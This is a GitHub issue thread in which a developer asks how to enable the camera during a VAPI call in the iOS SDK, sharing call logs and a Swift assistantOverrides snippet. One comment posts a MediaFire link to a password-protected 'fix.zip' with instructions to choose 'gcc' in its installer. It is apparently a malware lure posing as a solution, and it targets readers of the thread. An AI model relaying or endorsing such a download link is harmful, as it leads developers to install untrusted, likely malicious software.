### ISSUE TITLE
Assistance Needed to Enable Camera in VAPI Call

### ISSUE THREAD

**Issue by jai-raj-pb** [VapiAI/ios#15]
I'm working on a project using your repository and have encountered an issue when trying to enable the camera during a VAPI call.

From the logs, I noticed that the camera.isEnabled flag is currently set to false. Here is a snippet from the logs:

```
VAPI call started WebCallResponse(webCallUrl: https://vapi.daily.co/YIHypfJJUQBBwKrRjK3t, id: "****", artifactPlan: nil)
Soup send queue starting
CallManager event loop starting
Participant joined  PeerId="****" SendLog=false Terse=true
Not syncing subscriptions yet as we're not ready to subscribe  SendLog=false
API call: join(****, no token, {
  "inputs" : {
    "camera" : {
      "isEnabled" : false
    },
    "microphone" : {
      "isEnabled" : true
    }
  }
})  SendLog=true Terse=false
```

I have looked into the ```private func startCall(body: [String: Any]) async throws -> WebCallResponse ``` method, which parses the flag as ```response.artifactPlan?.videoRecordingEnabled```.

Could you please help me understand how to pass this flag to enable the camera (camera.isEnabled) as true?

I would greatly appreciate your guidance on how to proceed.

Thank you for your support!

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nikhilro** [comment]
Not an iOS dev but first q, what does claude say?

**Comment by jai-raj-pb** [comment]
`let assistantOverrides: [String: Any] = [
                    "artifactPlan": [
                        "videoRecordingEnabled": true
                    ]
                ]
                let response = try await vapi.start(assistantId: "xyz", assistantOverrides: assistantOverrides)`

**Comment by jai-raj-pb** [comment]
```
let assistantOverrides: [String: Any] = [
                    "artifactPlan": [
                        "videoRecordingEnabled": true
                    ]
                ]
                let response = try await vapi.start(assistantId: "---", assistantOverrides: assistantOverrides)
                ```
